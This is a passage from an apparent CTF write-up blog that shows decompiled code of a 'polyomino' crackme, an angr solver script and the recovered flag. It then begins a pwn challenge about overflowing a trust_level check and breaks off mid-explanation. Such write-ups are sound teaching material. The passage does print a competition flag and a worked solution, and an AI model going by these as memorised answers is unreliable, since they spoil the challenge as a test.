…\"</span><span class=\"token punctuation\">)</span>\n            rax_15 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n            <span class=\"token keyword\">break</span>\n        label_1285<span class=\"token operator\">:</span>\n        rdi_3 <span class=\"token operator\">=</span> rdi_3 <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rdi_3 <span class=\"token operator\">==</span> <span class=\"token number\">0x3c</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>data_40a0 <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">do</span>\n                    <span class=\"token class-name\">int32_t</span> rax_4 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span>i_1\n                    i_1 <span class=\"token operator\">=</span> i_1 <span class=\"token operator\">+</span> <span class=\"token number\">4</span>\n                    <span class=\"token class-name\">int32_t</span> temp4_1\n                    <span class=\"token class-name\">int32_t</span> temp5_1\n                    temp4_1<span class=\"token operator\">:</span>temp5_1 <span class=\"token operator\">=</span> sx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>rax_4<span class=\"token punctuation\">)</span>\n                    rdx_1 <span class=\"token operator\">=</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>mods<span class=\"token punctuation\">.</span>dp<span class=\"token punctuation\">.</span><span class=\"token function\">d</span><span class=\"token 
punctuation\">(</span>temp4_1<span class=\"token operator\">:</span>temp5_1<span class=\"token punctuation\">,</span> data_40a0<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                    <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>i_1 <span class=\"token operator\">-</span> <span class=\"token number\">4</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> divs<span class=\"token punctuation\">.</span>dp<span class=\"token punctuation\">.</span><span class=\"token function\">d</span><span class=\"token punctuation\">(</span>temp4_1<span class=\"token operator\">:</span>temp5_1<span class=\"token punctuation\">,</span> data_40a0<span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>i_1 <span class=\"token operator\">!=</span> <span class=\"token operator\">&amp;</span>data_40a4<span class=\"token punctuation\">)</span>\n            <span class=\"token function\">__printf_chk</span><span class=\"token punctuation\">(</span>flag<span class=\"token operator\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> format<span class=\"token operator\">:</span> <span class=\"token string\">\"Correct! 
Here's the flag: \"</span><span class=\"token punctuation\">,</span> rdx_1<span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">void</span> var_58\n            <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> i_2 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>var_58\n            <span class=\"token class-name\">int64_t</span> var_78 <span class=\"token operator\">=</span> data_4080\n            <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> rbp_1 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4020\n            <span class=\"token class-name\">int64_t</span> var_70_1 <span class=\"token operator\">=</span> data_4088\n            <span class=\"token class-name\">int16_t</span> var_68_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_4090<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_66_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_4094<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_64_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_4098<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_62_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_409c<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>w\n            <span class=\"token class-name\">int16_t</span> var_60_1 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>data_40a0<span class=\"token punctuation\">)</span><span 
class=\"token punctuation\">.</span>w\n            <span class=\"token function\">__builtin_memcpy</span><span class=\"token punctuation\">(</span>dest<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_58<span class=\"token punctuation\">,</span> src<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_78<span class=\"token punctuation\">,</span> n<span class=\"token operator\">:</span> <span class=\"token number\">0x1a</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">void</span> var_3e\n            <span class=\"token function\">__builtin_memcpy</span><span class=\"token punctuation\">(</span>dest<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_3e<span class=\"token punctuation\">,</span> src<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>var_78<span class=\"token punctuation\">,</span> n<span class=\"token operator\">:</span> <span class=\"token number\">0x1a</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">void</span> var_24\n            <span class=\"token keyword\">do</span>\n                <span class=\"token keyword\">char</span> rdi_4 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span>i_2 <span class=\"token operator\">^</span> <span class=\"token operator\">*</span>rbp_1\n                i_2 <span class=\"token operator\">=</span> i_2 <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n                rbp_1 <span class=\"token operator\">=</span> rbp_1 <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n                <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>i_2 <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token 
operator\">=</span> rdi_4\n                <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">d</span><span class=\"token punctuation\">(</span>rdi_4<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>var_24 <span class=\"token operator\">!=</span> i_2<span class=\"token punctuation\">)</span>\n            <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> <span class=\"token number\">0xa</span><span class=\"token punctuation\">)</span>\n            rax_15 <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n            <span class=\"token keyword\">break</span>\n    <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rax <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        noreturn\n    <span class=\"token keyword\">return</span> rax_15\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The nine integers read by <code class=\"language-text\">scanf</code> are processed inside the while loop. 
When the <code class=\"language-text\">rdi_3</code> variable reaches <code class=\"language-text\">0x3c</code>, the flag is decrypted using the accumulated values and printed.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i_1 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n<span class=\"token class-name\">int64_t</span> rsi <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n<span class=\"token class-name\">int64_t</span> rcx_1 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n<span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n<span class=\"token class-name\">uint64_t</span> rdx_1\n<span class=\"token keyword\">do</span>\n    <span class=\"token class-name\">int64_t</span> rdx <span class=\"token operator\">=</span> sx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>i<span class=\"token punctuation\">)</span>\n    i <span class=\"token operator\">=</span> i <span class=\"token operator\">+</span> <span class=\"token number\">4</span>\n    rdx_1 <span class=\"token operator\">=</span> rdx <span class=\"token operator\">*</span> rcx_1\n    rcx_1 <span class=\"token operator\">=</span> rcx_1 <span class=\"token operator\">*</span> rdi_3\n    rsi <span class=\"token operator\">=</span> rsi <span class=\"token operator\">+</span> rdx_1\n<span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>data_40a4 <span class=\"token operator\">!=</span> i<span class=\"token punctuation\">)</span>\n<span class=\"token 
keyword\">if</span> <span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x2c</span> <span class=\"token operator\">&amp;&amp;</span> rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x3a</span><span class=\"token punctuation\">)</span>\n    <span class=\"token class-name\">uint64_t</span> r9_2 <span class=\"token operator\">=</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">+</span> <span class=\"token number\">0x25</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">></span> <span class=\"token number\">0x36</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">&lt;=</span> <span class=\"token number\">0x36</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">not</span><span class=\"token punctuation\">(</span><span class=\"token function\">test_bit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x400c0210000001</span><span class=\"token punctuation\">,</span> r9_2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n       
     <span class=\"token keyword\">goto</span> label_1285\n        <span class=\"token keyword\">goto</span> label_138f\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n    label_138f<span class=\"token operator\">:</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>str<span class=\"token operator\">:</span> <span class=\"token string\">\"Those aren't the right numbers. …\"</span><span class=\"token punctuation\">)</span>\n    rax_15 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">break</span>\nlabel_1285<span class=\"token operator\">:</span>\nrdi_3 <span class=\"token operator\">=</span> rdi_3 <span class=\"token operator\">+</span> <span class=\"token number\">1</span></code></pre></div>\n<p>Honestly, I could not fully understand the mathematical details of what the loop is doing, so I decided to look for a way to extract the flag using angr anyway. 
I ended up using the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> angr\n<span class=\"token keyword\">import</span> claripy\n\nproj <span class=\"token operator\">=</span> angr<span class=\"token punctuation\">.</span>Project<span class=\"token punctuation\">(</span><span class=\"token string\">'./polyomino'</span><span class=\"token punctuation\">,</span> auto_load_libs<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n\nstart <span class=\"token operator\">=</span> <span class=\"token number\">0x401209</span>\nstate <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>blank_state<span class=\"token punctuation\">(</span>addr<span class=\"token operator\">=</span>start<span class=\"token punctuation\">,</span> add_options<span class=\"token operator\">=</span><span class=\"token punctuation\">{</span>angr<span class=\"token punctuation\">.</span>options<span class=\"token punctuation\">.</span>LAZY_SOLVES<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\nflag1 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag1'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag2 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag2'</span><span class=\"token punctuation\">,</span> <span class=\"token 
number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag3 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag3'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag4 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag4'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag5 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag5'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag6 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag6'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag7 <span class=\"token 
operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag7'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag8 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag8'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\nflag9 <span class=\"token operator\">=</span> claripy<span class=\"token punctuation\">.</span>BVS<span class=\"token punctuation\">(</span><span class=\"token string\">'flag9'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">,</span> explicit_name<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\n\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404080</span><span class=\"token punctuation\">,</span> flag1<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404084</span><span class=\"token punctuation\">,</span> flag2<span class=\"token punctuation\">,</span> 
endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404088</span><span class=\"token punctuation\">,</span> flag3<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x40408c</span><span class=\"token punctuation\">,</span> flag4<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404090</span><span class=\"token punctuation\">,</span> flag5<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404094</span><span class=\"token punctuation\">,</span> flag6<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x404098</span><span class=\"token 
punctuation\">,</span> flag7<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x40409c</span><span class=\"token punctuation\">,</span> flag8<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\nstate<span class=\"token punctuation\">.</span>memory<span class=\"token punctuation\">.</span>store<span class=\"token punctuation\">(</span><span class=\"token number\">0x4040a0</span><span class=\"token punctuation\">,</span> flag9<span class=\"token punctuation\">,</span> endness<span class=\"token operator\">=</span><span class=\"token string\">'Iend_LE'</span><span class=\"token punctuation\">)</span>\n\nfind <span class=\"token operator\">=</span> <span class=\"token number\">0x4012bd</span>\navoids <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0x401388</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x40138f</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x4013b2</span><span class=\"token punctuation\">]</span>\n\nsimgr <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>simgr<span class=\"token punctuation\">(</span>state<span class=\"token punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>explore<span class=\"token punctuation\">(</span>find<span class=\"token operator\">=</span>find<span class=\"token punctuation\">,</span> avoid<span class=\"token operator\">=</span>avoids<span class=\"token 
punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>explore<span class=\"token punctuation\">(</span>find<span class=\"token operator\">=</span>find<span class=\"token punctuation\">,</span> avoid<span class=\"token operator\">=</span>avoids<span class=\"token punctuation\">)</span>\n\nfound <span class=\"token operator\">=</span> simgr<span class=\"token punctuation\">.</span>found<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n\na <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag1<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nb <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag2<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag3<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag4<span class=\"token punctuation\">,</span> 
cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\ne <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag5<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag6<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\ng <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag7<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\nh <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag8<span class=\"token punctuation\">,</span> cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\ni <span class=\"token operator\">=</span> found<span class=\"token punctuation\">.</span>solver<span class=\"token punctuation\">.</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>flag9<span class=\"token punctuation\">,</span> 
cast_to<span class=\"token operator\">=</span><span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"{} {} {} {} {} {} {} {} {}\"</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">format</span><span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">,</span>b<span class=\"token punctuation\">,</span>c<span class=\"token punctuation\">,</span>d<span class=\"token punctuation\">,</span>e<span class=\"token punctuation\">,</span>f<span class=\"token punctuation\">,</span>g<span class=\"token punctuation\">,</span>h<span class=\"token punctuation\">,</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this solver produces a different result each time, but feeding those integers into the challenge binary yields a partially incomplete flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/45662/image-20240602172955944.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 5.833333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAATUlEQVQI12PwMHD672ns8t9N0/G/tazFf1t5q/82cpb/7RStwbSrmv3/AH3X/16a9v9tJQ3/20gY/LcB04Zg2lbS6L+tlBGYthbX/w8ADE8f02o1XDYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/8ac56/image-20240602172955944.webp 
240w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/d3be9/image-20240602172955944.webp 480w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/e46b2/image-20240602172955944.webp 960w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/e97dc/image-20240602172955944.webp 1410w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/8ff5a/image-20240602172955944.png 240w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/e85cb/image-20240602172955944.png 480w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/d9199/image-20240602172955944.png 960w,\n/static/2d056ba2ee2f2a3063b5dfe45b989a2e/45662/image-20240602172955944.png 1410w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2d056ba2ee2f2a3063b5dfe45b989a2e/d9199/image-20240602172955944.png\"\n            alt=\"image-20240602172955944\"\n            title=\"image-20240602172955944\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After repeating this several times and guessing the remaining characters that never filled in, I confirmed that <code class=\"language-text\">actf{wow_you_successfully_passed_algebra_4_3bf3c5d6}</code> was the correct flag.</p>\n<h2 id=\"exampwn\" style=\"position:relative;\"><a href=\"#exampwn\" aria-label=\"exampwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 
12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>exam(Pwn)</h2>\n<blockquote>\n<p>I thought my tiring AP season was over, but I heard that they’re offering a flag in AP Cybersecurity! The proctor seems to have trust issues though…</p>\n</blockquote>\n<p>First, let’s check the binary protections.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/1790f/image-20240525184639840.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 16.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqklEQVQI102Myw7BUAAFu/PYCAmNEKIeqUdvq7SKUm7Sllsr/P+vDK0Qi8mcxclo0joSryTKjUnmCVdHoZYZqbgUTqyU+zrjsbrw9DLUNEL2NyTjEGVGHNpL9rr9xmHbFGiREXAV53cs4uYp0pkk7Poce0HhsOMhB1t2LYHfmLOuTbErQ5zqqCDf/2inrkfcD1joJmLmYtcn2KUBTn4oGz+LnNLH/6Fv+MsLg5VbmOx5nw4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/8ac56/image-20240525184639840.webp 240w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/d3be9/image-20240525184639840.webp 480w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/e46b2/image-20240525184639840.webp 960w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/1671b/image-20240525184639840.webp 1189w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/8ff5a/image-20240525184639840.png 
240w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/e85cb/image-20240525184639840.png 480w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/d9199/image-20240525184639840.png 960w,\n/static/2541dd41572e6e4d6a3aeb4d98a9e84b/1790f/image-20240525184639840.png 1189w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2541dd41572e6e4d6a3aeb4d98a9e84b/d9199/image-20240525184639840.png\"\n            alt=\"image-20240525184639840\"\n            title=\"image-20240525184639840\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Decompiling the program reveals that the flag can be obtained if <code class=\"language-text\">trust_level</code> exceeds the threshold value (<code class=\"language-text\">0x7ffffffe</code>).</p>\n<p>The initial value of <code class=\"language-text\">trust_level</code> is computed as 0 minus the <code 